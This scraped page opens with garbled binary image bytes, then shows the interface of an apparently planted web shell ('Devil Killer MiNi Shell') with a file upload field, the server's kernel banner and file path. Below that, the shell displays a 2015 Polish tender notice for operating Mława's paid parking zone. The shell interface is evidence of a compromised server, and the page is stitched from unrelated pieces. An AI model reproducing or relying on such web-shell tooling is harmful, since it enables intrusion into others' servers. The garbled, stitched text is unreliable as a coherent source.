JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150520/118678-N-2015.html

<p class="kh_header"><b>Mława: Zorganizowanie i prowadzenie obsługi płatnych, niestrzeżonych parkingów dla pojazdów samochodowych na terenie Miasta Mława 2015-2019</b><br>
<b>Numer ogłoszenia: 118678 - 2015; data zamieszczenia: 20.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Mława , Stary Rynek 19, 06-500 Mława, woj. mazowieckie, tel. 23 6546441, faks 23 6543652.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mlawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i prowadzenie obsługi płatnych, niestrzeżonych parkingów dla pojazdów samochodowych na terenie Miasta Mława 2015-2019.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Postanowienia ogólne dotyczące przedmiotu zamówienia.

1.1.   Obszar Strefy Płatnego Parkowania.
  Strefą Płatnego Parkowania, w dalszej części SIWZ zwanej SPP, w myśl uchwały Rady Miasta Mława Nr XXIX/315/2008 z dnia 29 grudnia 2008 r. z późn. zm. w sprawie ustalenia strefy płatnego parkowania oraz ustalenia wysokości stawek i sposobu pobierania opłat za parkowanie pojazdów samochodowych na drogach publicznych miasta Mławy - objęto następujące ulice:
a)  ul. Stary Rynek po obu stronach wraz z parkingiem przy ratuszu,
b) ul. Spichrzowa po stronie północnej na odcinku od ul. Długiej do  wjazdu  na  teren osiedla,
c) ul. Długa po obu stronach na odcinkach od ulic Stanisława Wyspiańskiego 
i Spichrzowej do końca zatoczek postojowych,
d)  ul. 3 Maja po obu stronach,
e) ul. Stefana Żeromskiego po stronie parku miejskiego oraz po stronie wschodniej 
na  odcinku od ul. 3 Maja do ul. Żwirki,
f) ul. Chrobrego po obu stronach,
g) ul. Stanisława Wyspiańskiego na odcinku po lewej stronie od ul. Stefana Żeromskiego do ul. Henryka Sienkiewicza,
h) ul. Reymonta po obu stronach z wyłączeniem miejsc postojowych dla taksówek,
i) ul. Płocka na odcinku po obu stronach do skrzyżowania z ul. Szewską.
1.2.  Dni i godziny odpłatnego parkowania pojazdów samochodowych
1.2.1 Opłaty za parkowanie pobiera się w okresie od 1 stycznia do 31 grudnia
- od poniedziałku do piątku  -  w godz. od 1000 do 1800,
- w soboty -  w godz. od 1000 do 1400, 
- z wyłączeniem dni ustawowo wolnych od pracy
1.2.2 Burmistrz Miasta Mława może zarządzić okresowo odstąpienie od poboru opłat 
za parkowanie w dniach i godzinach wymienionych w pkt 1.2.1 oraz przy ulicach wymienionych w pkt 1.1.   
1.3.   Stawki opłat.
1.3.1.Wprowadzono opłaty za parkowanie pojazdów samochodowych w strefie płatnego parkowania  w n/w stawkach: 
1) za pierwsze pół godziny postoju --------------------------------------0,50 zł
2) za pierwszą godzinę postoju -------------------------------------------1,50 zł
3) za druga godzinę postoju -----------------------------------------------1,80 zł
4) za trzecią godzinę postoju ----------------------------------------------2,00 zł
5) za czwartą i każdą następną rozpoczętą godzinę postoju ----------1,50 zł
6) za kartę abonamentową parkingową jednomiesięczną -----------50,00  zł
7) za parkowanie na wydzielonym stanowisku postojowym zastrzeżonym kopertą przez całą dobę:
- karta abonamentowa parkingowa półroczna, płatna comiesięcznie ------------- 250,00 zł 
- karta abonamentowa parkingowa półroczna, płatna jednorazowo --------------1200,00 zł
- karta abonamentowa parkingowa roczna, płatna comiesięcznie ----------------- 200,00 zł
- karta abonamentowa parkingowa roczna, płatna jednorazowo ------------------1800,00zł
8) za parkowanie pojazdów będących własnością osób zamieszkałych w obszarze SPP, parkujących na ulicy, przy której są zameldowani
- karta abonamentowa parkingowa miesięczna ------------------------------------------5,00 zł
- karta abonamentowa parkingowa roczna --------------------------------------------- 60,00 zł
1.3.2.Opłata za wydanie karty abonamentowej parkingowej oraz karty abonamentowej specjalnej  wynosi 5 zł.
1.3.3.Opłata za  parkowanie pojazdów o dopuszczalnym ciężarze całkowitym ponad 3,5 tony w miejscach gdzie zezwalają na to przepisy ruchu drogowego, ustala się jako iloczyn ilości zajętych miejsc i stawek opłat, o których mowa w ust. 1.
1.4.   Ustala się  zerową stawkę opłat za parkowanie dla pojazdów: 
1) Straży Miejskiej,
2) obsługujących  mienie komunalne i administrujących drogami miejskimi:
-  Zakład Usług Komunalnych USKOM Sp. z o.o. w Mławie, 
-  Mławskie Przedsiębiorstwo Drogowo-Mostowe Sp. z o. o. w Mławie, 
3) oznaczonych  symbolem osoby niepełnosprawnej; w czasie  parkowania kierowca zobowiązany jest do pozostawienia za przednią szybą samochodu karty parkingowej, 
o której mowa w przepisach art. 8, ust. 1 i 3 ustawy z dnia 20 czerwca 1997 r. Prawo 
o ruchu drogowym (tekst jednolity Dz.U.2012.1137 z późniejszymi zmianami). Powyższe dotyczy także opiekunów osób niezdolnych do samodzielnej egzystencji, 
o których mowa w art. 8, ust. 3 cytowanej ustawy,
4) służb prowadzących eksploatację urządzeń  znajdujących się w pasach drogowych, m.in.:
-Zakład Wodociągów, Kanalizacji i Oczyszczalnia Ścieków WOD-KAN                              Sp. z o.o. w Mławie, 
- Przedsiębiorstwo Energetyki Cieplnej Sp. z o.o. w Mławie, 
- Zakład Energetyczny,
- Zakład  Gazowniczy, 
- Telekomunikacja Polska S.A. i inne przedsiębiorstwa telekomunikacyjne, 
5) przedsiębiorstw  i  jednostek,  z którymi  zarządca dróg  zawarł  umowy dotyczące obsługi technicznej miasta, lub którym wydano decyzje o zezwoleniu na prowadzenie robót w  pasie drogowym. 
6) służbowych Stacji Opieki - Centrum  Pielęgniarstwa Rodzinnego Caritas.
1.5.  Dysponentom pojazdów, o których mowa w pkt 1.4. wydaje się kartę abonamentową   specjalną.
1.6. Ustala się opłatę dodatkową, pobieraną w przypadku stwierdzenia przez służbę parkingową nieopłacenia postoju w Strefie Płatnego Parkowania. Opłata dodatkowa wniesiona w terminie 7 dni od daty nieopłaconego postoju wynosi 20 złotych, a po tym terminie 50 złotych. 
1.7.  Opłatę ustaloną w punkcie 1.6. uiszcza się w Biurze  Strefy Płatnego Parkowania lub 
na konto wskazane w wezwaniu do uiszczenia opłaty i doręczonym przez służbę parkingową w czasie określonym w punkcie 1.6.
1.8.   Egzekucja.
W przypadku nie uiszczenia opłaty, o której mowa w pkt 1.7 w ciągu 14 dni ściągnięcie  należności nastąpi przez Zamawiającego w trybie przepisów ustawy                     o postępowaniu egzekucyjnym  w  administracji, na podstawie wystawionych przez Wykonawcę zawiadomień.

2.    Przedmiotem zamówienia jest: 
2.1.  Opracowanie projektu stałej organizacji ruchu w SPP oraz uzyskanie niezbędnych 
do jego realizacji, uzgodnień. SPP umiejscowiona jest w strefie ochrony konserwatorskiej.
2.2.  Projekt stałej organizacji ruchu zostanie opracowany dla ulic na terenie Miasta Mława objętych strefą płatnego parkowania, wymienionych w § 1, ust. 2 Uchwały                            Nr XXIX/315/2008 Rady Miasta Mława z dnia 29.12.2008r. z późn. zm., wraz 
z uzyskaniem pozytywnych uzgodnień w zakresie skrzyżowań z ulicami należącymi 
do dróg wyższej kategorii i zarządcami odpowiednimi dla ich kategorii. Po zakończeniu umowy prawa autorskie projektu stałej organizacji ruchu przechodzą bezpłatnie 
na rzecz Miasta Mława. 
         Prace projektowe powinny zawierać następujący zakres opracowania:
a)	inwentaryzacja istniejącego oznakowania pionowego i poziomego, urządzeń bezpieczeństwa ruchu drogowego na poszczególnych ulicach,
b)	szczegółowe wytyczenie miejsc parkingowych z uwzględnieniem potrzeb kierowców niepełnosprawnych,  
c)	poddanie analizie projektowaną organizację ruchu pod kątem poprawy bezpieczeństwa             i płynności ruchu, w stosunku do stanu istniejącego,
d)	uzyskanie pozytywnych uzgodnień z zarządami dróg wyższej kategorii w zakresie organizacji ruchu na skrzyżowaniach, oraz pozytywnej opinii Komendanta Powiatowego Policji  w Mławie,
e)	wykaz znaków pionowych, w zestawieniu: do pozostawienia bez zmian, 
do przestawienia, do likwidacji, projektowanych oraz wykaz znaków poziomych: długość /ilość, łączna powierzchnia, 
f)	dokumentację techniczną należy opracować w wersji drukowanej, w 2 egz. dla każdej ulicy oraz w wersji cyfrowej dla całego opracowania, 
g)	dokumentację opracowaną w ilościach podanych w punkcie f) należy przekazać Zamawiającemu najpóźniej w 7 dni przed terminem przystąpienia do jej realizacji               w terenie.
Projekt powinien spełniać wymogi formalne wynikające z przepisów rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U.  Nr 220, poz. 2181) oraz Rozporządzenia Ministra Infrastruktury z dnia 23 września 2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. Nr 177 poz. 1729). 
2.3.  Urządzenie SPP.
2.3.1.Urządzenie i wyposażenie SPP w oznakowanie poziome i pionowe, zgodnie                            z zatwierdzonym projektem organizacji ruchu, o którym mowa w części  2  p.pkt  2.2. 
2.3.2.Dostawa i montaż wszystkich urządzeń technicznych niezbędnych do zorganizowania SPP, w tym zwłaszcza urządzeń do pobierania i rozliczania opłat parkingowych, które muszą spełniać, co najmniej, wymagania zawarte w części 3 p.pkt 3.1. Oznakowanie Strefy Płatnego Parkowania (w tym oznakowanie pionowe oraz oznakowanie poziome) po zakończeniu umowy pozostaje bezpłatnie własnością Miasta Mława.
2.3.3. Koordynowanie całości problematyki w trakcie organizacji SPP, w szczególności:
l) organizacja wykonawstwa i zgłoszenie robót w trybie przepisów prawa budowlanego,
2) koordynacja działań, ewentualnych podwykonawców, 
3) dostawa i montaż wszystkich materiałów, maszyn i urządzeń, potrzebnych 
do realizacji zamówienia, w tym parkometrów w kolorystyce uzgodnionej 
z Miastem Mława. 
4) stosowanie przy organizowaniu SPP wyrobów dopuszczonych do obrotu powszechnego lub jednostkowego stosowania na podstawie odrębnych przepisów,
5) wykonanie zadań związanych z przeprowadzeniem zagospodarowania terenów parkingowych,
6) wykonanie innych niezbędnych prac związanych z dostosowaniem terenu 
do potrzeb SPP,
7)  wykonanie wszystkich niezbędnych prób, pomiarów, rozruchu, itp., 
8) zorganizowanie i wyposażenie biura SPP zgodnie z wymaganiami określonymi 
w części 4 p.pkt 4.2.
2.3.4.Uruchomienie SPP od dnia 29.07.2015 r.
2.3.5.Zorganizowanie i prowadzenie obsługi SPP zgodnie z wymaganiami oraz w sposób gwarantujący jej właściwe funkcjonowanie w okresie realizacji niniejszego zamówienia.
2.3.6.Wykonawca przedłoży i dołączy do oferty harmonogram prac związanych 
z przygotowaniem i wyposażeniem SPP.

3. Wymagania techniczne dla urządzeń do pobierania i rozliczania  opłat parkingowych.
3.1. Wymaga się, aby urządzenia do pobierania i rozliczania opłat parkingowych (parkometry) posiadały:
1)	bezpieczne bezprzewodowe zasilanie, gwarantujące ciągłą eksploatację, 
2)	zabezpieczenie przed fałszowaniem dowodów wpłat,  kradzieżą oraz wandalizmem, 
3)	akceptowały uiszczenie opłat monetami na czas zależny od wniesionej opłaty,
4)	spełniały wymagania określone w Normach w zakresie:
            -   bezpieczeństwa, 
            -   odporności na uszkodzenia mechaniczne,  
            - niezakłóconego działania i wytrzymałości w trakcie pracy na otwartej przestrzeni          w naszej strefie klimatycznej,
5) posiadały na obudowie czytelne zapisane w języku polskim, angielskim i niemieckim            z informacjami o stawkach opłat parkingowych i godzinach obowiązywania opłat 
w SPP oraz wszelkie niezbędne informacje zapewniające poprawną obsługę,
6) dokumentowały wpływy z tytułu parkowania, czas opłaconego parkowania oraz:
            a) dane specyficzne dla urządzeń (nazwy i numery, miejsce ustawienia, daty oddania do  użytku, zmiany dot. nowego miejsca instalacji urządzeń, demontażu, itd.),
            b) liczbę wydanych biletów, 
            c) aktualną sumę przychodów, 
            d) informację o statusie każdego automatu (sprawny, niesprawny),
            e) aktualną zawartość kasetki na monety, 
            f)  meldunek o rodzaju usterki (np. brak papieru, awaria), 
g) inne informacje niezbędne do właściwej realizacji niniejszego zamówienia, 
a w szczególności, by pozwalały na jednoznaczne rozdzielanie wpływów na rzecz zarządcy wojewódzkiego i miasta Mława ( część 5, p.pkt 5.2.), 
7) drukowały  jednoczęściowe bilety parkingowe informujące o dacie, czasie rozpoczęcia i zakończenia parkowania, miejscu parkowania, kolejnym numerze biletu (zapisanym w postaci alfanumerycznej), wysokości przyjętej wpłaty, sposobie umieszczenia go w pojeździe oraz numerze kontaktowym Wykonawcy SPP,
3.2. Dopuszcza się wyłącznie urządzenia spełniające wszystkie wymagania określone                                    w części 3 pkt 3.1. 
3.3. Parkometr po zakończeniu niniejszego zamówienia pozostają własnością Wykonawcy SPP.
3.4.  Ilość parkometrów do obsługi obszaru SPP określa się na 23 sztuki. 
3.5. Wszystkie urządzenia winny być w jednym kolorze. Dopuszcza się kolor fabryczny 
z naniesionym metodą malowania lub naklejania, elementem charakterystycznym 
dla miasta Mława. Formę i treść tego elementu należy uzgodnić z miastem Mława. Wskazane jest, aby oznakowanie parkometrów było dobrze widoczne z odległości 
50 m.
3.6. Wszystkie urządzenia winny być fabrycznie nowe w dniu uruchomienia strefy. Dopuszcza się urządzenia używane jednie pod warunkiem wysokiej sprawności parkomatów oraz nienagannej ich estetki. 
3.7. Wymaga się, aby zorganizowano i udostępniono dla klientów możliwość dokonania płatności mobilnych za postój w SPP. 
3.7.1. W przypadku wnoszenia opłaty poprzez system płatności mobilnych należy informację w postaci nalepki, otrzymanej w biurze SPP, umieścić wewnątrz pojazdu, na przedniej szybie, po prawej stronie (po stronie pasażera) tuż nad winietą zawierającą numer rejestracyjny pojazdu. Osoba kontrolująca winna być wyposażona w przyrząd pozwalający odczytać ważność opłaty z nalepki umieszczonej na szybie zaparkowanego auta.

4.     Wymagania dotyczące zagospodarowania i wyposażenia  biura SPP.
4.1. Utworzenie biura SPP na terenie miasta Mława, w miejscu umożliwiającym parkowanie pojazdów samochodowych, minimum dwóch.
4.2. Wyposażenie biura SPP w urządzenia niezbędne do jego prawidłowego funkcjonowania,                          a w szczególności w:
      1)   jeden komputer klasy PC w minimalnej konfiguracji:
           a)  procesor klasy Pentium 4, 
           b) 1 GB pamięci RAM, 
           c)  dysk twardy 160 GB, 
           d)  nagrywarka DVD, 
           e)  system operacyjny Windows XP, 
           f)  przeglądarka do zdjęć,
           g)  dostęp do sieci Internet,
      2)   telefon z faksem, 
3) urządzenie wielofunkcyjne umożliwiające drukowanie, skanowanie i kopiowania dokumentów, 
4) wyposażenie pracowników SPP w telefony komórkowe i aparaty fotograficzne                     o rozdzielczości obrazu minimum 5 megapikseli, urządzenia do odczytu płatności mobilnych.
4.3. Opracowanie i uzgodnienie z Zamawiającym wzorów zawiadomień o stwierdzeniu parkowania bez uiszczenia opłaty obligującej do uiszczenia opłaty dodatkowej na podstawie przepisów:
      1)  ustawy z dnia 21 marca 1985 roku o drogach publicznych (t.j. Dz. U. 2013.260 z późn. zm.),
      2)  uchwały  Rady Miasta  Mława  Nr XXIX/315/2008 z dnia 29 grudnia 2008 r. z późn. zm.
4.4. Opracowanie i uzgodnienie z Zamawiającym wzorów abonamentowych kart parkingowych, zabezpieczonych przed fałszerstwem oraz ich druk na koszt Wykonawcy dla potrzeb SPP.
4.5. Stworzenie w biurze SPP komputerowej bazy danych, niezbędnej do rzetelnej kontroli wszystkich wpływów z opłat parkingowych, z podziałem na wpływy na rzecz zarządców dróg, o których mowa  w części 5, p.pkt 5.2., ust. 5.2.1.  i  5.2.2.
4.6. Stworzenie w biurze SPP oraz siedzibie Zamawiającego komputerowej bazy wystawionych zawiadomień o nieuiszczeniu opłaty parkingowej lub nieprzedłużeniu opłaty za parkowanie pojazdu  w SPP.
4.7. Stworzenie w biurze SPP komputerowej bazy fotograficznej potwierdzającej datę 
i miejsce postoju pojazdu każdorazowo dokumentującej wystawienie zaświadczenia, 
o którym mowa  w pkt 4.6.
4.8. Przekazanie Zamawiającemu oprogramowania wraz z licencją umożliwiającą Zamawiającemu jej prolongatę po zakończeniu umowy. Oprogramowanie powinno umożliwiać co najmniej:
- ewidencjonowanie nie uiszczonych opłat za parkowanie,
- generowanie upomnień, decyzji oraz tytułów wykonawczych zgodnych 
z obowiązującym stanem  prawnym,
- obsługę wydawanych przez Zamawiającego abonamentów,
- księgowanie wpłat (faktury) po otrzymaniu zawiadomienia, upomnienia, tytułów egzekucyjnych,
- tworzenie raportów, m.in.: statystycznych, rachunkowych, itp.,
- tworzenie wyciągów z kartotek o zawiadomieniu czy upomnieniu.
4.9. Dysponowanie: minimum 1 pracownikiem biurowym odpowiedzialnym jednocześnie 
za realizację zamówienia; kontrolerami oraz serwisantami w ilości osób do uznania Wykonawcy,  przewidzianymi do realizacji przedmiotu zamówienia - przeszkolenie ich, wyposażenie i umundurowanie.

5. Wymagania dotyczące prowadzenia obsługi SPP - obowiązki Wykonawcy  zamówienia.
5.1. Pobieranie w imieniu Zamawiającego opłat za parkowanie przy wykorzystaniu parkometrów zainstalowanych w SPP, płatności mobilnych, opłat dodatkowych określonych uchwałą Rady Miasta Mława oraz dystrybucja i ewidencjonowanie sprzedaży kart abonamentowych, o których mowa w pkt 1, p.pkt 1.3.1, ust. 6, 7 i 8 oraz w p.pkt 1.4.  
5.2. Dokumentowanie wszystkich wpływów oraz raportów dochodowych SPP do celów rozrachunkowych z Zamawiającym, z uwzględnieniem ich podziału na rzecz zarządców dróg:
5.2.1. zarząd województwa - w odniesieniu do wpływów pochodzących z opłat za miejsca postojowe zlokalizowane  przy  ul. Stary Rynek  - po obu stronach na odcinku 
od skrzyżowania z ulicą Narutowicza do skrzyżowania z ul. 18 Stycznia ( w ciągu drogi wojewódzkiej nr 544),
5.2.2. miasto Mława - w odniesieniu do wpływów pochodzących z opłat za miejsca postojowe pozostałe w SPP.
5.3.   Bieżące kontrolowanie uiszczania opłat za postój.
5.4. Wypisywanie zawiadomień informujących o nieuiszczeniu opłaty za parkowanie lub nieprzedłużeniu opłaty za parkowanie pojazdu w SPP, obligujących do zapłaty opłaty dodatkowej, i umieszczanie ich za wycieraczką samochodu. Fotograficzne lub inne wiarygodne dokumentowanie faktu nie uiszczenia opłaty oraz pozostawienia przez kontrolującego za wycieraczką pojazdu - zawiadomienia. Dokumentacja fotograficzna powinna zawierać datę i godzinę postoju, numer rejestracyjny pojazdu, charakterystyczny element infrastruktury miasta lub tło, pozwalający w sposób jednoznaczny określić faktyczne miejsce postoju pojazdu.
5.5.   Rozpatrywanie reklamacji.
5.6. Codzienna aktualizacja komputerowej bazy danych o wystawionych w danym dniu zawiadomieniach o nieuiszczeniu opłaty parkingowej lub nieprzedłużeniu opłaty 
za parkowanie pojazdu w SPP.
5.7. Przekazywanie Zamawiającemu wszystkich kopii wystawionych zawiadomień 
o obowiązku zapłaty opłaty dodatkowej za nieuiszczenie opłaty za parkowanie lub parkowanie ponad opłacony czas w SPP celem sprawdzenia dokonanych wpłat, ich ewidencji i dalszego dochodzenia przez Zamawiającego należności, wg przepisów 
o postępowaniu egzekucyjnym w administracji. Przekazywanie winno odbywać się nie później niż w trzecim dniu po zakończeniu miesiąca, łącznie z dokumentacją potwierdzającą nie wniesienie opłaty oraz pozostawienie zawiadomienia.
5.8. Przekazywanie Zamawiającemu aktualnej bazy wystawionych zawiadomień, nie rzadziej niż raz na miesiąc.
5.9. Przegrywanie na płytę DVD i przekazywanie Zamawiającemu aktualnej bazy fotograficznej,  o której mowa w pkt 5.4. za miniony miesiąc w czasie do trzeciego dnia kolejnego miesiąca.
5.10. Tworzenie kopii bezpieczeństwa na płytach CD lub DVD nie rzadziej niż:
         1)  jeden raz na miesiąc dla bazy wystawionych zawiadomień,
         2)  jeden raz na miesiąc dla bazy fotograficznej. 
5.11. Zagwarantowanie na własny koszt i ryzyko bezpiecznego dowiezienia do banku pieniędzy pobranych z parkometrów, celem dokonania wpłaty na konto Zamawiającego.
5.12. Dochody z parkometrów winny być wpłacone na konto Zamawiającego w dniu 
ich pobrania z parkometrów, pozostałe wpływy kasowe z SPP nie później niż przy kolejnej wpłacie dochodów z parkometrów. Opłaty pozostałe, pochodzące ze sprzedaży abonamentów i opłat dodatkowych oraz dochody z płatności mobilnych Wykonawca wpłaca na konto Zamawiającego, nie później niż przy kolejnej wpłacie dochodów z parkometrów. Rozliczenie całości wpływów nastąpi bezpośrednio po zakończeniu każdego miesiąca.
5.13. Dozór techniczny oraz kompleksowy serwis gwarantujący stałą gotowość operacyjną urządzeń, obejmujący między innymi naprawy i wymiany wszystkich urządzeń, w tym zwłaszcza urządzeń do pobierania i rozliczania opłat parkingowych lub ich elementów, części zamiennych, oznakowanie urządzeń nieczynnych.
5.14. Usuwanie wszelkich awarii w SPP wymagających wymiany części w terminie nie dłuższym niż 12 godzin od powzięcia wiadomości o ich zaistnieniu, z zastrzeżeniem, iż wszelkie szkody w zakresie oznakowania, awarii,  kradzieży czy uszkodzenia urządzeń SPP, usuwa na swój koszt Wykonawca, który również będzie dochodzić na własny koszt i we własnym zakresie, odszkodowanie od osoby, która ww. szkody spowodowała.
5.15. Usuwanie uszkodzeń parkometru w terminie nie dłuższym niż 2 godziny od powzięcia wiadomości o ich zaistnieniu (z wyłączeniem awarii, dla których czas naprawy określa się na 12 godzin przy jednoczesnym zachowaniu warunku powiadomienia Zamawiającego).
5.16. Zagwarantowanie nieodpłatnych dostaw części zamiennych od producenta urządzeń 
do pobierania i rozliczania opłat parkingowych, wszelkich materiałów eksploatacyjnych             w okresie realizacji.
5.17. Ponoszenie wszystkich kosztów związanych ze zmianą opłat za parkowanie w SPP             (np. koszty zmiany tablic i programów urządzeń do pomiaru czasu parkowania, itp.) oraz wszelkich kosztów modernizacji urządzeń.
5.18. Regularne czyszczenie i utrzymywanie w estetycznym stanie parkometrów, usuwanie szkód spowodowanych wandalizmem, kradzieżą, itp.
5.19. Koordynowanie napraw i prac serwisowo - nadzorczych.
5.20. Utrzymywanie w dobrym stanie, odnawianie, bieżąca konserwacja znaków drogowych oznakowania poziomego i pionowego SPP wraz z bieżącym aktualizowaniem oznakowania. 
5.21. Codzienna kontrola czytelności i kompletności oznakowania.
5.22. Bieżące przekazywanie Zamawiającemu informacji dotyczących funkcjonowania SPP.
5.23.Współpraca z Policją i Strażą Miejską oraz wyznaczonymi przez Burmistrza pracownikami nadzoru Zamawiającego.

6.  Zamawiający zastrzega sobie możliwość zmiany obszaru SPP w przypadku gdy Rada Miasta Mława zmieni treść § 1 uchwały.

7. Przewidywane przez Zamawiającego wpływy za cały okres realizacji umowy szacuje się na kwotę 2 100 000 zł brutto..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.71.24.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
